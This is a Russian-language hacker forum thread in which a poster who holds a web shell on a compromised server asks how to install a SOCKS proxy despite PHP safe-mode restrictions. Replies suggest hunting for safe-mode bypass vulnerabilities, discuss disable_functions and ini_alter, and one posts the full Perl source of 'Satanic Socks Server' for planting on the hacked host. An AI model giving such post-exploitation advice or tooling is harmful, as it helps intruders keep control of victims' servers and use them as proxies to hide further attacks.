Имеется веб шелл, необходимо поставить на тачку сокс. Проблема том, что php.ini, конфиги апача и других веб демонов найти не удалось. что посоветуете сделать?
http://www.securityfocus.com в поиск вбиваешь "safe mode" http://www.xakep.ru/vulnerability/PHP/ зы. ты выбрал путь "ПОТРАХАТЬСЯ", ибо найти без сейфа легче
ну ini_alter() не отключена, но изменять можно только опции с флагом PHP_INI_ALL.. а disable_functions к таковым не относится..
тебе уже посоветовали найти другой сервер, где таких ограничений нет... ну или попробуй этот socks поставить... Code: #!/usr/bin/perl # Satanic Socks Server v0.8.031206-perl # This script is private. Only for SaTaNiC team and friends. Not for sale. # Coded by drmist/STNC, web: www.stnc.ru. $auth_enabled = 0; $auth_login = "user"; $auth_pass = "pass"; $port = 3003; use IO::Socket::INET; $SIG{'CHLD'} = 'IGNORE'; $bind = IO::Socket::INET->new(Listen=>10, Reuse=>1, LocalPort=>$port) or die "Can't bind port $port\n"; while($client = $bind->accept()) { $client->autoflush(); if(fork()){ $client->close(); } else { $bind->close(); new_client($client); exit(); } } sub new_client { local $t, $i, $buff, $ord, $success; local $client = $_[0]; sysread($client, $buff, 1); if(ord($buff) == 5) { sysread($client, $buff, 1); $t = ord($buff); unless(sysread($client, $buff, $t) == $t) { return; } $success = 0; for($i = 0; $i < $t; $i++) { $ord = ord(substr($buff, $i, 1)); if($ord == 0 && !$auth_enabled) { syswrite($client, "\x05\x00", 2); $success++; break; } elsif($ord == 2 && $auth_enabled) { unless(do_auth($client)){ return; } $success++; break; } } if($success) { $t = sysread($client, $buff, 3); if(substr($buff, 0, 1) == '\x05') { if(ord(substr($buff, 2, 1)) == 0) { # reserved ($host, $raw_host) = socks_get_host($client); if(!$host) { return; } ($port, $raw_port) = socks_get_port($client); if(!$port) { return; } $ord = ord(substr($buff, 1, 1)); $buff = "\x05\x00\x00".$raw_host.$raw_port; syswrite($client, $buff, length($buff)); socks_do($ord, $client, $host, $port); } } } else { syswrite($client, "\x05\xFF", 2); }; } $client->close(); } sub do_auth { local $buff, $login, $pass; local $client = $_[0]; syswrite($client, "\x05\x02", 2); sysread($client, $buff, 1); if(ord($buff) == 1) { sysread($client, $buff, 1); sysread($client, $login, ord($buff)); sysread($client, $buff, 1); sysread($client, $pass, ord($buff)); if($login eq $auth_login && $pass eq $auth_pass) { syswrite($client, "\x05\x00", 2); return 1; } else { syswrite($client, "\x05\x01", 2); } } $client->close(); return 0; } sub socks_get_host { local $client = $_[0]; local $t, $ord, $raw_host; local $host = ""; sysread($client, $t, 1); $ord = ord($t); if($ord == 1) { sysread($client, $raw_host, 4); @host = $raw_host =~ /(.)/g; $host = ord($host[0]).".".ord($host[1]).".".ord($host[2]).".".ord($host[3]); } elsif($ord == 3) { sysread($client, $raw_host, 1); sysread($client, $host, ord($raw_host)); $raw_host .= $host; } elsif($ord == 4) { #ipv6 - not supported } return ($host, $t.$raw_host); } sub socks_get_port { local $client = $_[0]; local $raw_port, $port; sysread($client, $raw_port, 2); $port = ord(substr($raw_port, 0, 1)) << 8 | ord(substr($raw_port, 1, 1)); return ($port, $raw_port); } sub socks_do { local($t, $client, $host, $port) = @_; if($t == 1) { socks_connect($client, $host, $port); } elsif($t == 2) { socks_bind($client, $host, $port); } elsif($t == 3) { socks_udp_associate($client, $host, $port); } else { return 0; } return 1; } # this part of code was taken from datapipe.pl utility, # written by CuTTer (cutter[at]real.xakep.ru) # utility lays on cpan.org sub socks_connect { my($client, $host, $port) = @_; my $target = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp', Type => SOCK_STREAM); unless($target) { return; } $target->autoflush(); while($client || $target) { my $rin = ""; vec($rin, fileno($client), 1) = 1 if $client; vec($rin, fileno($target), 1) = 1 if $target; my($rout, $eout); select($rout = $rin, undef, $eout = $rin, 120); if (!$rout && !$eout) { return; } my $cbuffer = ""; my $tbuffer = ""; if ($client && (vec($eout, fileno($client), 1) || vec($rout, fileno($client), 1))) { my $result = sysread($client, $tbuffer, 1024); if (!defined($result) || !$result) { return; } } if ($target && (vec($eout, fileno($target), 1) || vec($rout, fileno($target), 1))) { my $result = sysread($target, $cbuffer, 1024); if (!defined($result) || !$result) { return; } } if ($fh && $tbuffer) { print $fh $tbuffer; } while (my $len = length($tbuffer)) { my $res = syswrite($target, $tbuffer, $len); if ($res > 0) { $tbuffer = substr($tbuffer, $res); } else { return; } } while (my $len = length($cbuffer)) { my $res = syswrite($client, $cbuffer, $len); if ($res > 0) { $cbuffer = substr($cbuffer, $res); } else { return; } } } } sub socks_bind { my($client, $host, $port) = @_; # not supported } sub socks_udp_associate { my($client, $host, $port) = @_; # not supported }